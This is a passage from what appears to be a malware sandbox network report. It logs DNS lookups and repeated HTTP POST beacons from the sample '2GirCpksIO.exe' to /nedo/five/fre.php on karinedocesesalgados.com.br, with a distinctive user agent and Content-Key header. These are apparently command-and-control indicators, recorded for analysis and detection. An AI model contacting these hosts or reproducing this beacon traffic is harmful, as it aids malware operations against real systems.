                                Nov 22, 2021 15:29:08.094974041 CET4978980192.168.11.20192.185.217.246
                                Nov 22, 2021 15:29:08.110783100 CET8049789192.185.217.246192.168.11.20
                                Nov 22, 2021 15:29:08.111011028 CET4978980192.168.11.20192.185.217.246

                                UDP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Nov 22, 2021 15:28:57.935935974 CET6329553192.168.11.201.1.1.1
                                Nov 22, 2021 15:28:58.180563927 CET53632951.1.1.1192.168.11.20
                                Nov 22, 2021 15:29:00.404613972 CET4987053192.168.11.201.1.1.1
                                Nov 22, 2021 15:29:00.798486948 CET53498701.1.1.1192.168.11.20

                                DNS Queries

                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                Nov 22, 2021 15:28:57.935935974 CET192.168.11.201.1.1.10x38ceStandard query (0)afrocompass.comA (IP address)IN (0x0001)
                                Nov 22, 2021 15:29:00.404613972 CET192.168.11.201.1.1.10xb881Standard query (0)karinedocesesalgados.com.brA (IP address)IN (0x0001)

                                DNS Answers

                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                Nov 22, 2021 15:28:58.180563927 CET1.1.1.1192.168.11.200x38ceNo error (0)afrocompass.com68.66.226.70A (IP address)IN (0x0001)
                                Nov 22, 2021 15:29:00.798486948 CET1.1.1.1192.168.11.200xb881No error (0)karinedocesesalgados.com.br192.185.217.246A (IP address)IN (0x0001)

                                HTTP Request Dependency Graph

                                • afrocompass.com
                                • karinedocesesalgados.com.br

                                HTTP Packets

                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                0192.168.11.204978768.66.226.70443C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                1192.168.11.2049788192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                Nov 22, 2021 15:29:00.949976921 CET313OUTPOST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 178
                                Connection: close
                                Nov 22, 2021 15:29:01.265006065 CET314INHTTP/1.1 404 Not Found
                                Date: Mon, 22 Nov 2021 14:29:01 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 15
                                Content-Type: text/html
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                10192.168.11.2049797192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                Nov 22, 2021 15:29:15.742523909 CET328OUTPOST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:16.046370983 CET329INHTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:15 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                100192.168.11.2049887192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                101192.168.11.2049888192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                102192.168.11.2049889192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                103192.168.11.2049890192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                104192.168.11.2049891192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                105192.168.11.2049892192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                106192.168.11.2049893192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                107192.168.11.2049894192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                108192.168.11.2049895192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                109192.168.11.2049896192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                11192.168.11.2049798192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                Nov 22, 2021 15:29:16.767343998 CET329OUTPOST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:17.064059973 CET330INHTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:16 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                110192.168.11.2049897192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                111192.168.11.2049898192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                112192.168.11.2049899192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                113192.168.11.2049900192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                114192.168.11.2049901192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                115192.168.11.2049902192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                116192.168.11.2049903192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                117192.168.11.2049904192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                118192.168.11.2049905192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                119192.168.11.2049906192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                12192.168.11.2049799192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                Nov 22, 2021 15:29:17.727560997 CET331OUTPOST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:18.023998976 CET331INHTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:17 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                120192.168.11.2049907192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                121192.168.11.2049908192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                122192.168.11.2049909192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                123192.168.11.2049910192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                124192.168.11.2049911192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                125192.168.11.2049912192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                126192.168.11.2049913192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                127192.168.11.2049914192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                128192.168.11.2049915192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                129192.168.11.2049916192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                13192.168.11.2049800192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                Nov 22, 2021 15:29:18.707510948 CET332OUTPOST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:19.010202885 CET333INHTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:18 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                130192.168.11.2049917192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                131192.168.11.2049918192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                132192.168.11.2049919192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                133192.168.11.2049920192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                134192.168.11.2049921192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                135192.168.11.2049922192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                136192.168.11.2049923192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                137192.168.11.2049924192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                138192.168.11.2049925192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                139192.168.11.2049926192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                14192.168.11.2049801192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                Nov 22, 2021 15:29:19.741161108 CET333OUTPOST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:20.064798117 CET334INHTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:19 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                140192.168.11.2049927192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                141192.168.11.2049928192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                142192.168.11.2049929192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                143192.168.11.2049930192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                144192.168.11.2049931192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                145192.168.11.2049932192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                146192.168.11.2049933192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                147192.168.11.2049934192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                148192.168.11.2049935192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                149192.168.11.2049936192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                15192.168.11.2049802192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                Nov 22, 2021 15:29:20.815320969 CET335OUTPOST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:21.128072023 CET335INHTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:20 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                150192.168.11.2049937192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                151192.168.11.2049938192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                152192.168.11.2049939192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                153192.168.11.2049940192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                154192.168.11.2049941192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                155192.168.11.2049942192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                156192.168.11.2049943192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                157192.168.11.2049944192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                158192.168.11.2049945192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                159192.168.11.2049946192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                16192.168.11.2049803192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                Nov 22, 2021 15:29:21.862086058 CET337OUTPOST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:22.159688950 CET337INHTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:21 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                160192.168.11.2049947192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                161192.168.11.2049948192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                162192.168.11.2049949192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                163192.168.11.2049950192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                164192.168.11.2049951192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                165192.168.11.2049952192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                166192.168.11.2049953192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                167192.168.11.2049954192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                168192.168.11.2049955192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                169192.168.11.2049956192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                17192.168.11.2049804192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                Nov 22, 2021 15:29:22.752104044 CET338OUTPOST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:23.050029039 CET339INHTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:22 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                170192.168.11.2049957192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                171192.168.11.2049958192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                172192.168.11.2049959192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                173192.168.11.2049960192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                174192.168.11.2049961192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                175192.168.11.2049962192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                176192.168.11.2049963192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                177192.168.11.2049964192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                178192.168.11.2049965192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                179192.168.11.2049966192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                18192.168.11.2049805192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                Nov 22, 2021 15:29:23.755166054 CET339OUTPOST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:24.056802034 CET340INHTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:23 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                180192.168.11.2049967192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                181192.168.11.2049968192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                182192.168.11.2049969192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                183192.168.11.2049970192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                184192.168.11.2049971192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                185192.168.11.2049972192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                186192.168.11.2049973192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                187192.168.11.2049974192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                188192.168.11.2049975192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                189192.168.11.2049976192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                19192.168.11.2049806192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                Nov 22, 2021 15:29:24.727797985 CET340OUTPOST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:25.011589050 CET341INHTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:24 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                190192.168.11.2049977192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                191192.168.11.2049978192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                192192.168.11.2049979192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                193192.168.11.2049980192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                194192.168.11.2049981192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                195192.168.11.2049982192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                196192.168.11.2049983192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                197192.168.11.2049984192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


